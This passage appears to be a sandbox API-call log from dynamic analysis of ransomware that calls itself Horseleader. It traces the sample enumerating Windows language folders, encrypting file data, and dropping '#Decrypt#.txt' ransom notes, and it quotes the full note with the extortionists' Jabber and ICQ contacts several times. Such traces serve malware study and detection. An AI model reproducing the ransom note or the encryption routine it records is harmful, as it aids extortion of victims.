nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="da-DK", cAlternateFileName="")) returned 1 [0229.350] lstrcmpiW (lpString1="da-DK", lpString2="Windows") returned -1 [0229.350] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK") returned 60 [0229.350] lstrcmpW (lpString1="da-DK", lpString2=".") returned 1 [0229.350] lstrcmpW (lpString1="da-DK", lpString2="..") returned 1 [0229.350] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0229.350] GetProcessHeap () returned 0x780000 [0229.350] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0229.350] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*") returned 62 [0229.350] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0229.351] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0229.351] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\.") returned 62 [0229.351] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0229.351] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0229.351] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0229.351] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\ink\\da-DK\\..") returned 63 [0229.351] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0229.351] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0229.351] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6fbc310, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe71ab4c9, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe71d1626, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0229.351] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0229.351] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 76 [0229.351] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0229.351] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0229.351] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0229.351] lstrlenW (lpString=".testttjffg") returned 11 [0229.351] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0229.351] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0229.352] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0229.352] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft 
shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0229.352] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6fbc310, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe71ab4c9, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe71d1626, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0229.352] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0229.352] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\#Decrypt#.txt") returned 74 [0229.352] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0229.353] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0229.353] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0229.354] lstrlenA (lpString="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") returned 1368 [0229.354] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0229.354] CloseHandle (hObject=0x158) returned 1 [0229.354] GetProcessHeap () returned 0x780000 [0229.354] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0229.354] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="de-DE", cAlternateFileName="")) returned 1 [0229.354] lstrcmpiW (lpString1="de-DE", lpString2="Windows") returned -1 [0229.354] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE") returned 60 [0229.354] lstrcmpW (lpString1="de-DE", lpString2=".") returned 1 [0229.354] lstrcmpW (lpString1="de-DE", lpString2="..") returned 1 [0229.354] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0229.354] GetProcessHeap () returned 0x780000 [0229.354] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7db828 [0229.354] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*") returned 62 [0229.354] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0229.426] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0229.426] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\.") returned 62 [0229.426] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0229.426] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0229.426] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0229.426] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\..") returned 63 [0229.426] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0229.426] lstrcmpW (lpString1="..", lpString2="..") returned 
0 [0229.426] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe728fcf7, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe74cb16a, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe74cb16a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0229.426] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0229.426] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 76 [0229.426] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0229.427] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0229.427] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0229.427] lstrlenW (lpString=".testttjffg") returned 11 [0229.427] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0229.427] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0229.427] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0229.427] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0229.952] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe728fcf7, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe74cb16a, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe74cb16a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0229.953] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0229.953] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\#Decrypt#.txt") returned 74 [0229.953] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0229.956] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0229.957] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0229.958] lstrlenA (lpString="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") returned 1368 [0229.958] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0229.959] CloseHandle (hObject=0x158) returned 1 [0229.959] GetProcessHeap () returned 0x780000 [0229.959] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0229.960] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="el-GR", cAlternateFileName="")) returned 1 [0229.960] lstrcmpiW (lpString1="el-GR", lpString2="Windows") returned -1 [0229.960] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR") returned 60 [0229.960] lstrcmpW (lpString1="el-GR", lpString2=".") returned 1 [0229.960] lstrcmpW (lpString1="el-GR", lpString2="..") returned 1 [0229.960] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0229.960] GetProcessHeap () returned 0x780000 [0229.960] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7db828 [0229.960] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*") returned 62 [0229.960] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0229.961] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0229.961] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\.") returned 62 [0229.961] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0229.961] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0229.961] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0229.961] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\..") returned 63 [0229.961] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0229.961] lstrcmpW (lpString1="..", lpString2="..") returned 
0 [0229.961] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe31667d9, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe337baef, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe337baef, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0229.961] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0229.961] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui") returned 76 [0229.961] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0229.961] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0229.961] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0229.961] lstrlenW (lpString=".testttjffg") returned 11 [0229.961] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0229.961] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0229.962] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0229.962] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0229.962] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe31667d9, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe337baef, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe337baef, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0229.962] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0229.962] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\#Decrypt#.txt") returned 74 [0229.962] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0229.963] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0229.963] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0229.965] lstrlenA (lpString="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") returned 1368 [0229.965] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0229.965] CloseHandle (hObject=0x158) returned 1 [0229.965] GetProcessHeap () returned 0x780000 [0229.965] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0229.965] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="en-US", cAlternateFileName="")) returned 1 [0229.965] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0229.965] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 60 [0229.965] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0229.965] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0229.965] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0229.966] GetProcessHeap () returned 0x780000 [0229.966] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
